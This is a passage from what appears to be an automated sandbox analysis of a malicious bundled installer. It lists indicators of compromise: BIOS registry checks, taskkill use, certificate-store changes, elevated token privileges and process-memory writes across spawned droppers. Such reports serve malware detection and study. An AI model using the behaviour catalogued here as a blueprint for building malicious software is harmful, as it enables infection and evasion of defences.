\REGISTRY\MACHINE\Hardware\Description\System\BIOS msiexec.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 6896 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
svchost.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs -
Modifies registry class 2 IoCs
Processes:
gdgame.exeSetup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ gdgame.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Setup.exe -
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 16 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 30 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 51 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeSetup.exeChrome 5.exe5643419.exemsedge.exemsedge.exe5390489.exemsiexec.exeWerFault.exeultramediaburner.tmpSetup.exeBexaepunuly.exepid process 3728 powershell.exe 3728 powershell.exe 3728 powershell.exe 3728 powershell.exe 5488 WerFault.exe 5488 WerFault.exe 5884 WerFault.exe 5884 WerFault.exe 5516 WerFault.exe 5516 WerFault.exe 5612 WerFault.exe 5612 WerFault.exe 1692 WerFault.exe 1692 WerFault.exe 5404 WerFault.exe 5404 WerFault.exe 3692 WerFault.exe 3692 WerFault.exe 5248 WerFault.exe 5248 WerFault.exe 6108 Setup.exe 6108 Setup.exe 6108 Setup.exe 6108 Setup.exe 1368 Chrome 5.exe 1368 Chrome 5.exe 5804 5643419.exe 5804 5643419.exe 1536 msedge.exe 1536 msedge.exe 5496 msedge.exe 5496 msedge.exe 1684 5390489.exe 1684 5390489.exe 4620 msiexec.exe 4620 msiexec.exe 4208 WerFault.exe 4208 WerFault.exe 6060 ultramediaburner.tmp 6060 ultramediaburner.tmp 5452 Setup.exe 5452 Setup.exe 5452 Setup.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe 3152 Bexaepunuly.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Fri19d30056588.exeFri191454c4b4.exepowershell.exe1.exe2.exeFri192c305b4a.exeWerFault.exe4.exeWerFault.exe5.exe6.exe7.exeBearVpn 3.exe5390489.exe5643419.exeSetup.exeChrome 5.exe46807GHF____.exeSetup.exedescription pid process Token: SeCreateTokenPrivilege 3924 Fri19d30056588.exe Token: SeAssignPrimaryTokenPrivilege 3924 Fri19d30056588.exe Token: SeLockMemoryPrivilege 3924 Fri19d30056588.exe Token: SeIncreaseQuotaPrivilege 3924 Fri19d30056588.exe Token: SeMachineAccountPrivilege 3924 Fri19d30056588.exe Token: SeTcbPrivilege 3924 Fri19d30056588.exe Token: SeSecurityPrivilege 3924 Fri19d30056588.exe Token: SeTakeOwnershipPrivilege 3924 Fri19d30056588.exe Token: SeLoadDriverPrivilege 3924 Fri19d30056588.exe Token: SeSystemProfilePrivilege 3924 Fri19d30056588.exe Token: SeSystemtimePrivilege 3924 Fri19d30056588.exe Token: SeProfSingleProcessPrivilege 3924 Fri19d30056588.exe Token: SeIncBasePriorityPrivilege 3924 Fri19d30056588.exe Token: SeCreatePagefilePrivilege 3924 Fri19d30056588.exe Token: SeCreatePermanentPrivilege 3924 Fri19d30056588.exe Token: SeBackupPrivilege 3924 Fri19d30056588.exe Token: SeRestorePrivilege 3924 Fri19d30056588.exe Token: SeShutdownPrivilege 3924 Fri19d30056588.exe Token: SeDebugPrivilege 3924 Fri19d30056588.exe Token: SeAuditPrivilege 3924 Fri19d30056588.exe Token: SeSystemEnvironmentPrivilege 3924 Fri19d30056588.exe Token: SeChangeNotifyPrivilege 3924 Fri19d30056588.exe Token: SeRemoteShutdownPrivilege 3924 Fri19d30056588.exe Token: SeUndockPrivilege 3924 Fri19d30056588.exe Token: SeSyncAgentPrivilege 3924 Fri19d30056588.exe Token: SeEnableDelegationPrivilege 3924 Fri19d30056588.exe Token: SeManageVolumePrivilege 3924 Fri19d30056588.exe Token: SeImpersonatePrivilege 3924 Fri19d30056588.exe Token: SeCreateGlobalPrivilege 3924 Fri19d30056588.exe Token: 31 3924 Fri19d30056588.exe Token: 32 3924 Fri19d30056588.exe Token: 33 3924 Fri19d30056588.exe Token: 34 3924 Fri19d30056588.exe Token: 35 3924 Fri19d30056588.exe Token: SeDebugPrivilege 4868 Fri191454c4b4.exe Token: SeDebugPrivilege 3728 powershell.exe Token: SeDebugPrivilege 804 1.exe Token: SeDebugPrivilege 5124 2.exe Token: SeDebugPrivilege 1020 Fri192c305b4a.exe Token: SeDebugPrivilege 5340 WerFault.exe Token: SeDebugPrivilege 5464 4.exe Token: SeRestorePrivilege 5516 WerFault.exe Token: SeBackupPrivilege 5516 WerFault.exe Token: SeBackupPrivilege 5516 WerFault.exe Token: SeDebugPrivilege 5640 5.exe Token: SeDebugPrivilege 5796 6.exe Token: SeDebugPrivilege 5916 7.exe Token: SeDebugPrivilege 6088 BearVpn 3.exe Token: SeDebugPrivilege 1684 5390489.exe Token: SeDebugPrivilege 5804 5643419.exe Token: SeDebugPrivilege 6108 Setup.exe Token: SeDebugPrivilege 1368 Chrome 5.exe Token: SeDebugPrivilege 4940 46807GHF____.exe Token: SeDebugPrivilege 5452 Setup.exe Token: SeIncreaseQuotaPrivilege 3728 powershell.exe Token: SeSecurityPrivilege 3728 powershell.exe Token: SeTakeOwnershipPrivilege 3728 powershell.exe Token: SeLoadDriverPrivilege 3728 powershell.exe Token: SeSystemProfilePrivilege 3728 powershell.exe Token: SeSystemtimePrivilege 3728 powershell.exe Token: SeProfSingleProcessPrivilege 3728 powershell.exe Token: SeIncBasePriorityPrivilege 3728 powershell.exe Token: SeCreatePagefilePrivilege 3728 powershell.exe Token: SeBackupPrivilege 3728 powershell.exe -
Suspicious use of FindShellTrayWindow 9 IoCs
Processes:
Fri195cd4dbfdf37897.tmpstats.tmpAdorarti.exe.commsedge.exeultramediaburner.tmpinstaller.exepid process 1556 Fri195cd4dbfdf37897.tmp 5480 stats.tmp 1360 Adorarti.exe.com 1360 Adorarti.exe.com 1360 Adorarti.exe.com 1360 Adorarti.exe.com 5496 msedge.exe 6060 ultramediaburner.tmp 7832 installer.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Adorarti.exe.compid process 1360 Adorarti.exe.com 1360 Adorarti.exe.com 1360 Adorarti.exe.com 1360 Adorarti.exe.com -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
cmd.exepid process 3332 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4868 wrote to memory of 4812 4868 setup_x86_x64_install.exe setup_installer.exe PID 4868 wrote to memory of 4812 4868 setup_x86_x64_install.exe setup_installer.exe PID 4868 wrote to memory of 4812 4868 setup_x86_x64_install.exe setup_installer.exe PID 4812 wrote to memory of 4124 4812 setup_installer.exe setup_install.exe PID 4812 wrote to memory of 4124 4812 setup_installer.exe setup_install.exe PID 4812 wrote to memory of 4124 4812 setup_installer.exe setup_install.exe PID 4124 wrote to memory of 4832 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4832 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4832 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 5040 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 5040 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 5040 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 5068 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 5068 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 5068 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 3896 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 3896 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 3896 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 5024 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 5024 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 5024 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 980 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 980 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 980 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 2400 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 2400 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 2400 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4736 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4736 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4736 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 588 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 588 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 588 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 3916 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 3916 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 3916 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4476 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4476 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4476 4124 setup_install.exe cmd.exe PID 5024 wrote to memory of 4852 5024 